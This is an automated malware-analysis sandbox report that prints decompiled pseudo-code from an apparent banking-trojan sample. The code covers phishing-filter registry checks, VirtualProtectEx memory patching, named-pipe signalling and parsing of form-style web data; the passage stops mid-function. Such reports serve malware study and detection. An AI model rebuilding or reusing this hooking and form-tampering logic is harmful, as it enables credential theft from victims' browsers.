        • RegCloseKey.ADVAPI32(00000004,?,00412226,00000004,?,?,00000000,?,?,?,?,0040D78C,80000001,Enabled), ref: 0041229A
        Strings
        • Enabled, xrefs: 0041225F
        • software\microsoft\internet explorer\phishingfilter, xrefs: 00412269
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseOpenQueryValue
        • String ID: Enabled$software\microsoft\internet explorer\phishingfilter
        • API String ID: 3677997916-3174912645
        • Opcode ID: 49bde7066094ab12d5290b1cc3877c700f64e363c7f4393a1bdae24fc6e55d01
        • Instruction ID: 21bf141f7b662de0dc43bcf15fd1b0b59a1b42d884064bc964c9240f03a19c96
        • Opcode Fuzzy Hash: 49bde7066094ab12d5290b1cc3877c700f64e363c7f4393a1bdae24fc6e55d01
        • Instruction Fuzzy Hash: B3F0A57224410DBFEF014F91DC85FEA3F2DEB54784F008026FA0995560D772E9A1AB68
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 98%
        			E00407949(void* __ecx, signed int __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, char _a16, char _a20) {
        				long _v8;
        				void* __edi;
        				intOrPtr* _t24;
        				intOrPtr _t25;
        				signed short _t26;
        				int _t27;
        				signed short _t28;
        				intOrPtr* _t29;
        				signed short _t31;
        				int _t32;
        				signed short _t34;
        				signed short _t37;
        				void* _t42;
        				signed int _t48;
        				void* _t57;
        
        				_t48 = __edx;
        				_push(__ecx);
        				_v8 = _v8 & 0x00000000;
        				_t24 = _a8;
        				if(_a16 != 2) {
        					_t25 =  *_t24;
        				} else {
        					_t25 =  *((intOrPtr*)(_t24 + 0x10));
        				}
        				if(_t25 != 0) {
        					_t42 = _t25 + _a4;
        					_t26 = IsBadHugeReadPtr(_t42, 4);
        					__eflags = _t26;
        					if(_t26 == 0) {
        						while(1) {
        							_t31 =  *_t42;
        							__eflags = _t31;
        							if(_t31 == 0) {
        								break;
        							}
        							__eflags = _a16 - 2;
        							if(_a16 != 2) {
        								__eflags = _a16;
        								if(_a16 != 0) {
        									__eflags = _a16 - 1;
        									if(_a16 != 1) {
        										goto L18;
        									} else {
        										__eflags = _t31;
        										if(_t31 < 0) {
        											goto L18;
        										} else {
        											_t57 = _t31 + _a4;
        											_t34 = VirtualProtectEx( *0x414ad0, _t57, 4, 0x40,  &_v8);
        											__eflags = _t34;
        											if(_t34 == 0) {
        												goto L18;
        											} else {
        												_t17 = _t57 + 2; // 0x4144e2
        												_t48 = _t48 | 0xffffffff;
        												_t37 = E0040F65D(_t48, _a12, _t48, _t17);
        												VirtualProtectEx( *0x414ad0, _t57, 4, _v8,  &_v8);
        												__eflags = _t37;
        												goto L17;
        											}
        										}
        									}
        								} else {
        									__eflags = _t31;
        									if(_t31 >= 0) {
        										goto L18;
        									} else {
        										__eflags = _a12 - (_t31 & 0x0000ffff);
        										goto L17;
        									}
        								}
        							} else {
        								__eflags = _t31 - _a12;
        								L17:
        								if(__eflags != 0) {
        									L18:
        									_t42 = _t42 + 4;
        									_t32 = IsBadHugeReadPtr(_t42, 4);
        									__eflags = _t32;
        									if(_t32 == 0) {
        										continue;
        									}
        								}
        							}
        							break;
        						}
        					}
        					_t27 = IsBadHugeReadPtr(_t42, 4);
        					__eflags = _t27;
        					if(_t27 != 0) {
        						L26:
        						_t28 = 0;
        						__eflags = 0;
        					} else {
        						__eflags =  *_t42 - _t27;
        						if( *_t42 == _t27) {
        							goto L26;
        						} else {
        							__eflags = _a16 - 2;
        							if(_a16 != 2) {
        								_t29 = _a8;
        								_t53 =  *((intOrPtr*)(_t29 + 0x10)) -  *_t29 + _t42;
        								__eflags =  *((intOrPtr*)(_t29 + 0x10)) -  *_t29 + _t42;
        							} else {
        								_t53 = _t42;
        							}
        							_t28 = E00407811(_t53,  &_a20);
        						}
        					}
        				} else {
        					_t28 = 0;
        				}
        				return _t28;
        			}



















        APIs
        • IsBadHugeReadPtr.KERNEL32(00000000,00000004), ref: 00407977
        • IsBadHugeReadPtr.KERNEL32(-00000004,00000004), ref: 00407A09
        • IsBadHugeReadPtr.KERNEL32(00000000,00000004), ref: 00407A1B
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: HugeRead
        • String ID:
        • API String ID: 2080902951-0
        • Opcode ID: 356e5e9bafaf206b3497a54341e0262fef745a6cdf260c7a433ec65f0ed5853e
        • Instruction ID: 7a557ba9de92cdf11a0bc1b520e92e1cb8b68de6f9c3bdf062155dbeec040a6b
        • Opcode Fuzzy Hash: 356e5e9bafaf206b3497a54341e0262fef745a6cdf260c7a433ec65f0ed5853e
        • Instruction Fuzzy Hash: 0A3196B1B48205ABEF20CF24DC44B9B37A9AB41354F144476F901B71D1D778EA01CBAA
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 83%
        			E00412042(void* __ecx, void* __edx) {
        				char _v5;
        				char _v12;
        				char _v16;
        				char _v20;
        				char _v24;
        				void* _t20;
        				void* _t29;
        				WCHAR** _t40;
        
        				_t40 = 0x4040bc;
        				_v24 = 2;
        				do {
        					_t20 = OpenMutexW(0x1f0001, 0,  *_t40);
        					if(_t20 == 0) {
        						goto L13;
        					}
        					CloseHandle(_t20);
        					E00411F19( *_t40, 0xb,  &_v12);
        					E00411F19( *_t40, 0xc,  &_v16);
        					E00411F19( *_t40, 0xd,  &_v20);
        					E00411F19( *_t40, 3, 0);
        					_v5 = 0;
        					while(1) {
        						_t29 = OpenMutexW(0x1f0001, 0,  *_t40);
        						if(_t29 == 0) {
        							break;
        						}
        						CloseHandle(_t29);
        						Sleep(0x3e8);
        						_v5 = _v5 + 1;
        						if(_v5 < 0xa) {
        							continue;
        						}
        						L12:
        						E0040F15E(_v12);
        						E0040F15E(_v16);
        						_t20 = E0040F15E(_v20);
        						goto L13;
        					}
        					if(_v12 != 0) {
        						E00410093(_v12);
        					}
        					if(_v16 != 0) {
        						E00410093(_v16);
        					}
        					if(_v20 != 0) {
        						E00410093(_v20);
        					}
        					goto L12;
        					L13:
        					_t40 =  &(_t40[1]);
        					_t18 =  &_v24;
        					 *_t18 = _v24 - 1;
        				} while ( *_t18 != 0);
        				return _t20;
        			}












        APIs
        • OpenMutexW.KERNEL32(001F0001,00000000,004040BC,?,?,00000000), ref: 00412062
        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00412071
          • Part of subcall function 00411F19: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,\\.\pipe\,00000012,001F0001,004040BC,00000000), ref: 00411F92
          • Part of subcall function 00411F19: SetNamedPipeHandleState.KERNEL32(00000000,00000000,00000000,00000000), ref: 00411FAD
          • Part of subcall function 00411F19: WriteFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 00411FCC
          • Part of subcall function 00411F19: ReadFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 00411FE2
          • Part of subcall function 00411F19: CloseHandle.KERNEL32(00000000), ref: 00412003
          • Part of subcall function 00411F19: WaitNamedPipeW.KERNEL32(?,000000FF), ref: 00411F7A
          • Part of subcall function 00411F19: ReadFile.KERNEL32(00000000,00000000,?,00000008,00000000), ref: 00412025
        • OpenMutexW.KERNEL32(001F0001,00000000,004040BC,004040BC,00000003,00000000,004040BC,0000000D,?,004040BC,0000000C,00406C1F,004040BC,0000000B,?), ref: 004120AF
        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 004120BA
        • Sleep.KERNEL32(000003E8,?,?,00000000), ref: 004120C5
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: FileHandle$Close$MutexNamedOpenPipeRead$CreateSleepStateWaitWrite
        • String ID:
        • API String ID: 2066843493-0
        • Opcode ID: b24485a49a1fa779ef516574d500274133a0d83c6e4c1ce53014dc560ff307bf
        • Instruction ID: c23ad63ed52c6758965fbfe24c90ff854173a6673f5648454e666d96a8ab52b4
        • Opcode Fuzzy Hash: b24485a49a1fa779ef516574d500274133a0d83c6e4c1ce53014dc560ff307bf
        • Instruction Fuzzy Hash: 73216931900108FBDF226BA1ED45AEEBF79BF44308F10847BF240B0061D7BA4E95DA59
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040BEAD(struct HINSTANCE__* __esi, WCHAR* _a4) {
        				WCHAR* _t8;
        				intOrPtr _t9;
        				signed int _t15;
        				signed char _t19;
        				signed char _t20;
        				void* _t21;
        				struct HINSTANCE__* _t22;
        
        				_t22 = __esi;
        				if( *0x414d14 != 0) {
        					L10:
        					return 0;
        				}
        				_t8 = PathFindFileNameW(_a4);
        				_t9 =  *0x414ad4; // 0x241f5a8
        				if(lstrcmpiW( *(_t9 + 0x18c), _t8) != 0) {
        					goto L10;
        				}
        				_t19 = 0;
        				while(GetProcAddress(_t22,  *(0x4011ac + (_t19 & 0x000000ff) * 4)) != 0) {
        					_t19 = _t19 + 1;
        					if(_t19 < 4) {
        						continue;
        					}
        					if(GetProcAddress(_t22, 5) != 0) {
        						goto L10;
        					}
        					_t20 = 0;
        					while(1) {
        						_t15 = (_t20 & 0x000000ff) << 2;
        						_t5 = _t15 + 0x4011bc; // 0x5
        						_t6 = _t15 + 0x4011c0; // 0x14d
        						if(FindResourceW(_t22,  *_t6,  *_t5) == 0) {
        							goto L10;
        						}
        						_t20 = _t20 + 2;
        						if(_t20 < 0xc) {
        							continue;
        						}
        						E0040C598(_t21);
        						 *0x414d14 = _t22;
        						return 1;
        					}
        					goto L10;
        				}
        				goto L10;
        			}











        APIs
        • PathFindFileNameW.SHLWAPI(?,?,00405D3E,?), ref: 0040BEBF
        • lstrcmpiW.KERNEL32(?,00000000,?,00405D3E,?), ref: 0040BED1
        • GetProcAddress.KERNELBASE(?), ref: 0040BEE8
        • GetProcAddress.KERNELBASE(?,00000005), ref: 0040BEFC
        • FindResourceW.KERNEL32(?,0000014D,00000005,?,00405D3E,?), ref: 0040BF1B
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddressFindProc$FileNamePathResourcelstrcmpi
        • String ID:
        • API String ID: 1997813603-0
        • Opcode ID: 2e7920e833e343bd1b69625fcfc55f5100d3294579f8effddcc7be8820cef78c
        • Instruction ID: 0459f605290b404f9ab3514d4189705575a9951d8ee93359c8b5c8d98d6350a8
        • Opcode Fuzzy Hash: 2e7920e833e343bd1b69625fcfc55f5100d3294579f8effddcc7be8820cef78c
        • Instruction Fuzzy Hash: DA018F30262211AFEB101B60ED09BE73798EB56B01F15807AF104F61F1E73985119FAD
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040A9B9(void** __esi, intOrPtr _a4) {
        				void* _t7;
        
        				_t18 = __esi;
        				if(__esi != 0) {
        					SetEvent(__esi[1]);
        					E0040AA33(_t18, _a4, 0, 0, 0, 0, 0);
        					WaitForSingleObject(__esi[2], 0xffffffff);
        					CloseHandle( *__esi);
        					CloseHandle(__esi[1]);
        					CloseHandle(__esi[2]);
        					E0040F15E(__esi[4]);
        					return E0040F15E(__esi);
        				}
        				return _t7;
        			}





        APIs
        • SetEvent.KERNEL32(?,00000000,0040A179,?), ref: 0040A9C3
          • Part of subcall function 0040AA33: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 0040AA88
          • Part of subcall function 0040AA33: SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 0040AAA3
          • Part of subcall function 0040AA33: WriteFile.KERNEL32(00000000,?,00000004,00000002,00000000,?,?,00000000), ref: 0040AABF
          • Part of subcall function 0040AA33: WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040AAD8
          • Part of subcall function 0040AA33: WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 0040AAF2
          • Part of subcall function 0040AA33: ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040AB0B
          • Part of subcall function 0040AA33: ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040AB28
        • WaitForSingleObject.KERNEL32(?,000000FF,0000EA60,00000000,00000000,00000000,00000000,00000000), ref: 0040A9DC
        • CloseHandle.KERNEL32(00000004), ref: 0040A9E4
        • CloseHandle.KERNEL32(?), ref: 0040A9ED
        • CloseHandle.KERNEL32(?), ref: 0040A9F6
          • Part of subcall function 0040F15E: HeapFree.KERNEL32(00000000,00000000,0040AD5B,00000000,00000001), ref: 0040F171
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$Handle$CloseWrite$Read$CreateEventFreeHeapNamedObjectPipeSingleStateWait
        • String ID:
        • API String ID: 998100866-0
        • Opcode ID: 5d994378e7847f40d16b00a7550d1f94cd0f7806d355c205d0c7040332dee989
        • Instruction ID: da5bddd0fc5110b3fe368369576718b1227d1fb47b94fedbf0700e348707432c
        • Opcode Fuzzy Hash: 5d994378e7847f40d16b00a7550d1f94cd0f7806d355c205d0c7040332dee989
        • Instruction Fuzzy Hash: 4AE0C932504601EFCB222F65FE0988ABA72BF947113108A3AF1A6604B4CB365962DB18
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 92%
        			E0040CEFA(void* __edx, intOrPtr _a4, char _a7, intOrPtr _a8, intOrPtr* _a12, signed int* _a16) {
        				signed int _v5;
        				char _v6;
        				unsigned int _v12;
        				signed int _v16;
        				unsigned int _v20;
        				signed int _v24;
        				signed int _v28;
        				signed int _v32;
        				intOrPtr _v36;
        				char _v52;
        				char _v68;
        				char _v84;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				signed short _t140;
        				signed int _t146;
        				signed short _t147;
        				signed short _t148;
        				signed int _t149;
        				signed short _t151;
        				signed char _t152;
        				signed int _t153;
        				signed int _t157;
        				void* _t159;
        				signed char _t163;
        				unsigned int _t164;
        				intOrPtr _t167;
        				intOrPtr _t168;
        				signed int _t169;
        				signed int _t171;
        				signed int _t173;
        				signed int _t176;
        				signed int _t180;
        				void* _t191;
        				signed int _t192;
        				signed int _t196;
        				void* _t198;
        				intOrPtr _t202;
        				signed int _t208;
        				signed int _t210;
        				signed int _t212;
        				void* _t219;
        				signed int _t220;
        				void* _t223;
        				intOrPtr* _t224;
        				char* _t239;
        				signed int _t246;
        				void* _t250;
        				intOrPtr _t255;
        				signed int _t256;
        				signed int _t261;
        				signed int* _t262;
        				signed int _t263;
        				signed int _t264;
        				char* _t266;
        				signed int _t269;
        				intOrPtr* _t271;
        				signed int _t273;
        				void* _t274;
        				void* _t275;
        
        				_t255 = _a8;
        				if( *((intOrPtr*)(_t255 + 0x41c)) < 8) {
        					return 0;
        				}
        				_v16 = _v16 & 0x00000000;
        				_t269 = E004124A2( &_v16, __edx, __eflags, _a4, 0x4e2a, 0x20000000);
        				_v32 = _t269;
        				_v6 = 0;
        				__eflags = _t269;
        				if(_t269 == 0) {
        					L73:
        					E0040F15E(_v32);
        					return _v6;
        				} else {
        					__eflags = _v16 - 0x10;
        					if(_v16 <= 0x10) {
        						goto L73;
        					} else {
        						goto L4;
        					}
        					while(1) {
        						L4:
        						__eflags = ( *_t269 & 0x0000ffff) - _v32 + _t269 - _v16;
        						if(( *_t269 & 0x0000ffff) - _v32 + _t269 > _v16) {
        							goto L73;
        						}
        						_t140 =  *(_t269 + 8) & 0x0000ffff;
        						__eflags = _t140;
        						if(_t140 == 0) {
        							L13:
        							_t269 = _t269 + ( *_t269 & 0x0000ffff);
        							__eflags = _t269 - _v32 + 0x10 - _v16;
        							if(_t269 - _v32 + 0x10 < _v16) {
        								continue;
        							}
        							goto L73;
        						}
        						_v12 = (_t140 & 0x0000ffff) + _t269;
        						_v24 = E0040F637((_t140 & 0x0000ffff) + _t269);
        						_t146 = E0040A3D4((_t140 & 0x0000ffff) + _t269, _t145, _t255,  *((intOrPtr*)(_t255 + 0x400)), 0, 0, 0);
        						__eflags = _t146;
        						if(_t146 == 0) {
        							goto L13;
        						}
        						_t147 =  *(_t269 + 0xa) & 0x0000ffff;
        						__eflags = _t147;
        						if(_t147 == 0) {
        							L9:
        							_t148 =  *(_t269 + 0xc) & 0x0000ffff;
        							__eflags = _t148;
        							if(_t148 == 0) {
        								L15:
        								__eflags =  *((char*)(_t269 + 6)) - 9;
        								if( *((char*)(_t269 + 6)) > 9) {
        									 *((char*)(_t269 + 6)) = 0;
        								}
        								__eflags =  *(_t269 + 4);
        								if( *(_t269 + 4) == 0) {
        									 *(_t269 + 4) = 1;
        								}
        								_t149 =  *((intOrPtr*)(_t269 + 6));
        								_v5 = _t149;
        								__eflags = _t149;
        								if(_t149 == 0) {
        									_v5 = 6;
        								}
        								_t256 =  *(_t255 + 0x418);
        								_t219 =  *((intOrPtr*)(_a8 + 0x41c)) + _t256;
        								_v20 = _v20 & 0x00000000;
        								_t244 = _t256;
        								while(1) {
        									__eflags = _t256 - _t219;
        									if(_t256 >= _t219) {
        										break;
        									}
        									__eflags =  *_t256 - 0x3d;
        									if( *_t256 != 0x3d) {
        										L40:
        										_t256 = _t256 + 1;
        										__eflags = _t256;
        										continue;
        									}
        									_t151 =  *(_t269 + 0xe) & 0x0000ffff;
        									_a7 = 0;
        									__eflags = _t151;
        									if(_t151 != 0) {
        										_t208 = E0040A3D4((_t151 & 0x0000ffff) + _t269, E0040F637((_t151 & 0x0000ffff) + _t269), _t244, _t256 - _t244, 0, 0, 0);
        										__eflags = _t208;
        										if(_t208 == 0) {
        											_a7 = 1;
        										}
        									}
        									_t152 =  *((intOrPtr*)(_t269 + 5));
        									__eflags = _t152;
        									if(_t152 != 0) {
        										_v20 = _v20 + 1;
        										__eflags = (_t152 & 0x000000ff) - _v20;
        										if((_t152 & 0x000000ff) != _v20) {
        											_t44 =  &_a7;
        											 *_t44 = _a7 + 1;
        											__eflags =  *_t44;
        										}
        									}
        									_t153 = _t256;
        									_v28 = _t256;
        									while(1) {
        										__eflags = _t153 - _t219;
        										if(_t153 >= _t219) {
        											break;
        										}
        										_t153 = _t153 + 1;
        										__eflags =  *_t153 - 0x26;
        										_v28 = _t153;
        										if( *_t153 != 0x26) {
        											continue;
        										}
        										break;
        									}
        									__eflags = _a7;
        									if(_a7 != 0) {
        										L39:
        										_t244 = _v28 + 1;
        										__eflags = _v28 + 1;
        										goto L40;
        									}
        									_t246 = _v5 & 0x000000ff;
        									__eflags = _t153 - _t256 - 1 - _t246;
        									if(_t153 - _t256 - 1 != _t246) {
        										goto L39;
        									}
        									_t223 = 0;
        									__eflags = _t246;
        									if(_t246 <= 0) {
        										L38:
        										_t157 = E004101CA( &_v68, _v12, _v24);
        										__eflags = _t157;
        										if(_t157 != 0) {
        											_t220 = _v5 & 0x000000ff;
        											_v36 = _t256 + 1;
        											_t159 = E0040F19A( &_v52, _t256 + 1, _t220);
        											 *((char*)(_t275 + _t220 - 0x30)) = 0;
        											_v28 = E0040F3F1(_t159, _t223);
        											_v20 = 0;
        											_t163 = E004089BF( &_v20, _t223, 0,  &_v68);
        											_v12 = _t163;
        											_v24 = 0;
        											__eflags = _t163 & 0x00000003;
        											if((_t163 & 0x00000003) != 0) {
        												_v12 = 0;
        											}
        											_t224 = _v20;
        											_t164 = 4;
        											__eflags = _v12 - _t164;
        											if(_v12 < _t164) {
        												_v12 = _t164;
        											} else {
        												_v24 =  *_t224;
        											}
        											asm("sbb dl, dl");
        											_v12 = _v12 >> 2;
        											_t250 =  ~(_v24 % ( *(_t269 + 4) & 0x000000ff)) + 1;
        											_t261 = 1;
        											_a7 = _t250;
        											__eflags = _v12 - 1;
        											if(_v12 <= 1) {
        												L53:
        												__eflags = _t250;
        												if(_t250 <= 0) {
        													L62:
        													_t167 =  *0x414ad4; // 0x241f5a8
        													_v6 = 1;
        													__eflags = _t250 - 1;
        													if(_t250 != 1) {
        														_t168 =  *((intOrPtr*)(_t167 + 0x188));
        													} else {
        														_t168 =  *((intOrPtr*)(_t167 + 0x184));
        													}
        													_a8 = _t168;
        													_t169 = E0040F637(_t168);
        													_t262 = _a16;
        													_t271 = _a12;
        													_v16 = _t169;
        													_t171 = E0040F0F6( *_t262 + _t220 + _t169 + 0x14, _t271);
        													__eflags = _t171;
        													if(_t171 != 0) {
        														wnsprintfA( &_v52, 0xf, "%%0%uu", _t220);
        														wnsprintfA( &_v84, 0xf,  &_v52, _v28);
        														 *_t262 =  *_t262 + E0040F19A( *_t271 +  *_t262, _a8, _v16);
        														E0040F19A( *_t271 +  *_t262,  &_v84, _t220);
        														_t191 =  *_t262 + _t220;
        														 *((char*)(_t191 +  *_t271)) = 0xa;
        														_t192 = _t191 + 1;
        														__eflags = _t192;
        														 *_t262 = _t192;
        													}
        													L68:
        													_t263 = _v12;
        													_t124 = _t263 + 4; // 0x6
        													_t173 = E0040F0F6(_t124,  &_v20);
        													_t273 = _v20;
        													__eflags = _t173;
        													if(_t173 != 0) {
        														__eflags = _a7 - 2;
        														if(_a7 != 2) {
        															_t180 = _v24 + 1;
        															__eflags = _t180;
        															 *_t273 = _t180;
        														}
        														_t176 = _t263 << 2;
        														 *((intOrPtr*)(_t176 + _t273)) = _v28;
        														__eflags = _t176 + 4;
        														E00408A2F(_t176 + 4, _t176 + 4, 0,  &_v68, _t273);
        													}
        													E0040F15E(_t273);
        													goto L73;
        												}
        												_t264 = E0040F1B1( *((intOrPtr*)(_a8 + 0x418)),  *((intOrPtr*)(_a8 + 0x41c)));
        												_v16 = _t264;
        												__eflags = _t264;
        												if(_t264 == 0) {
        													goto L68;
        												}
        												_t251 = _a8;
        												_t266 = _t264 -  *((intOrPtr*)(_a8 + 0x418)) + _v36;
        												__eflags =  *(_t269 + 2) & 0x00000001;
        												if(__eflags == 0) {
        													E0040F21C(_t194, _t266, 0x31, _t220);
        													L60:
        													_t196 = E0040CE43(_t251, __eflags, _v16,  *((intOrPtr*)(_t251 + 0x41c)));
        													__eflags = _t196;
        													if(_t196 == 0) {
        														E0040F15E(_v16);
        														goto L68;
        													}
        													_t250 = _a7;
        													goto L62;
        												}
        												_t274 = _t220 + _t266;
        												__eflags = _t266 - _t274;
        												if(__eflags >= 0) {
        													goto L60;
        												} else {
        													goto L57;
        												}
        												do {
        													L57:
        													_push(0x30);
        													_t198 = 0x39;
        													 *_t266 = E004102A8(_t198);
        													_t266 = _t266 + 1;
        													__eflags = _t266 - _t274;
        												} while (__eflags < 0);
        												_t251 = _a8;
        												goto L60;
        											} else {
        												while(1) {
        													__eflags =  *((intOrPtr*)(_t224 + _t261 * 4)) - _v28;
        													if( *((intOrPtr*)(_t224 + _t261 * 4)) == _v28) {
        														break;
        													}
        													_t261 = _t261 + 1;
        													__eflags = _t261 - _v12;
        													if(_t261 < _v12) {
        														continue;
        													}
        													goto L53;
        												}
        												_a7 = 2;
        												_t250 = _a7;
        												goto L53;
        											}
        										}
        										goto L39;
        									} else {
        										goto L35;
        									}
        									while(1) {
        										L35:
        										_t202 =  *((intOrPtr*)(_t223 + _t256 + 1));
        										__eflags = _t202 - 0x30;
        										if(_t202 < 0x30) {
        											goto L39;
        										}
        										__eflags = _t202 - 0x39;
        										if(_t202 > 0x39) {
        											goto L39;
        										}
        										_t223 = _t223 + 1;
        										__eflags = _t223 - _t246;
        										if(_t223 < _t246) {
        											continue;
        										}
        										goto L38;
        									}
        									goto L39;
        								}
        								goto L73;
        							}
        							_t239 = (_t148 & 0x0000ffff) + _t269;
        							__eflags =  *_t239 - 0x2a;
        							if( *_t239 != 0x2a) {
        								L12:
        								_t210 = E0040A3D4(_t239, E0040F637(_t239),  *(_t255 + 0x418),  *((intOrPtr*)(_t255 + 0x41c)), 0, 0, 0);
        								__eflags = _t210;
        								if(_t210 == 0) {
        									goto L15;
        								}
        								goto L13;
        							}
        							__eflags =  *(_t239 + 1);
        							if( *(_t239 + 1) == 0) {
        								goto L15;
        							}
        							goto L12;
        						}
        						_t212 = E0040A3D4((_t147 & 0x0000ffff) + _t269, E0040F637((_t147 & 0x0000ffff) + _t269),  *(_t255 + 0x418),  *((intOrPtr*)(_t255 + 0x41c)), 0, 0, 0);
        						__eflags = _t212;
        						if(_t212 == 0) {
        							goto L13;
        						}
        						goto L9;
        					}
        					goto L73;
        				}
        			}


        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID:
        • String ID: %%0%uu$essAsUserA
        • API String ID: 0-3201396839
        • Opcode ID: e4713c1603cecc59f0da45cfc0ecbb99b3b8a0828cff629a1e3e1e56285905fb
        • Instruction ID: cf35a8ef1cb2921f5123bc59124c1333a99e2fd469c5c80858b695ec58b5cced
        • Opcode Fuzzy Hash: e4713c1603cecc59f0da45cfc0ecbb99b3b8a0828cff629a1e3e1e56285905fb
        • Instruction Fuzzy Hash: 14D1C570D04249AFDF10DFA4C880AFEBBB5AF45308F14807AE895BB2C1D739994AC758
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 72%
        			E00408322(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags, char* _a4) {
        				char _v5;
        				char _v6;
        				signed int _v7;
        				char _v12;
        				char _v16;
        				signed int _v20;
        				intOrPtr _v24;
        				intOrPtr _v28;
        				char _v32;
        				char _v36;
        				intOrPtr _v40;
        				intOrPtr* _v44;
        				intOrPtr _v48;
        				signed int _v52;
        				char _v56;
        				char* _v60;
        				signed int _v64;
        				intOrPtr _v68;
        				intOrPtr _v72;
        				intOrPtr _v76;
        				intOrPtr _v80;
        				char _v84;
        				intOrPtr _t87;
        				void* _t89;
        				intOrPtr _t91;
        				intOrPtr _t103;
        				intOrPtr _t104;
        				char* _t108;
        				void* _t109;
        				signed int _t115;
        				signed char _t116;
        				signed char _t122;
        				intOrPtr* _t132;
        				char* _t135;
        				void* _t141;
        				intOrPtr _t143;
        				intOrPtr _t144;
        				char _t145;
        				intOrPtr _t152;
        				void* _t153;
        				intOrPtr _t156;
        				signed int _t158;
        
        				_t136 = __ecx;
        				 *0x414ed8("ssLongW");
        				_t138 = _a4;
        				_v6 = 0;
        				_t87 = E004123F4(0, _a4);
        				_v28 = _t87;
        				if(_t87 == 0) {
        					L51:
        					E0040F15E(_a4);
        					_t89 =  *0x414edc("ssLongW");
        					 *0x414a2c =  *0x414a2c - 1;
        					return _t89;
        				} else {
        					_push(__ebx);
        					_push(__esi);
        					_push(__edi);
        					do {
        						_t150 = _v28;
        						_t132 = _v28 + 0xc;
        						_v44 = _t132;
        						if( *_t132 <= 0x10) {
        							goto L43;
        						}
        						_t152 = E00412454(_t150);
        						_v24 = _t152;
        						if(_t152 == 0) {
        							goto L43;
        						}
        						_v20 = _v20 & 0x00000000;
        						_v5 = 0;
        						if(E004089BF(0, _t136, 0, _t152) != 0) {
        							_v5 = 3;
        							L37:
        							_t141 = E00404196(_t136);
        							_t176 = _t141;
        							if(_t141 != 0) {
        								_t153 = E004124A2(0, _t138, _t176, _t141, 0x4e23, 0x20000000);
        								E0040F15E(_t141);
        								if(_t153 != 0 &&  *_t153 != 0) {
        									_v64 = _v64 & 0;
        									_v56 = _v5;
        									_v52 = _v20;
        									_v48 = _v24;
        									_t103 =  *0x414a30; // 0x2210041
        									_v72 = _t103;
        									_t104 =  *0x414b7c; // 0x418000
        									_v68 = _t104 + 0x2a;
        									_v84 = _t153;
        									_v80 = E0040822E;
        									_v76 = E0040831E;
        									_v60 =  &_v56;
        									E0041333E( &_v84, _t104 + 0x2a);
        								}
        								E0040F15E(_t153);
        							}
        							E0040F15E(_v24);
        							goto L43;
        						}
        						_t143 =  *_t132 + _t152;
        						_t11 = _t152 + 0x10; // 0x10
        						_t108 = _t11;
        						_v40 = _t143;
        						if(_t108 >= _t143) {
        							L35:
        							_push(_t132);
        							_push(_v24);
        							_push(0);
        							_t109 = 4;
        							E00408A2F(_t109, _t175);
        							goto L37;
        						}
        						while(_v5 == 0) {
        							_t135 = _t108;
        							if( *_t108 == 0xa) {
        								L10:
        								_v20 = _v20 + 1;
        								_t136 =  &_v32;
        								_t138 = _t135;
        								if(E0040A600(_t108, _t135,  &_v12,  &_v32) == 0) {
        									L32:
        									_t56 = _t135 + 1; // 0x11
        									_t108 = _t56;
        									if(_t108 < _t143) {
        										continue;
        									}
        									_t175 = _v5;
        									if(_v5 != 0) {
        										goto L37;
        									}
        									_t132 = _v44;
        									goto L35;
        								} else {
        									_v12 = _v12 + 1;
        									_t156 = _v12 - _v32;
        									_v7 = 0;
        									do {
        										_t144 =  *0x414ad4; // 0x241f5a8
        										_t136 =  *((intOrPtr*)(_t144 + ( *(0x4141f8 + (_v7 & 0x000000ff) * 8) & 0x0000ffff) * 4));
        										_t138 = _t156;
        										if(E0040F65D(_v7 & 0x000000ff | 0xffffffff,  *((intOrPtr*)(_t144 + ( *(0x4141f8 + (_v7 & 0x000000ff) * 8) & 0x0000ffff) * 4)), _t156, _v32) == 0) {
        											_t158 = (_v7 & 0x000000ff) << 3;
        											_t33 = _t158 + 0x4141f8; // 0x1010042
        											_t115 =  *_t33 & 0x0000ffff;
        											__eflags = _t115 - 0x38;
        											if(__eflags != 0) {
        												__eflags = _t115 - 0x44;
        												if(__eflags != 0) {
        													__eflags = _t115 - 0x34;
        													if(__eflags != 0) {
        														__eflags = _t115 - 0x35;
        														if(__eflags != 0) {
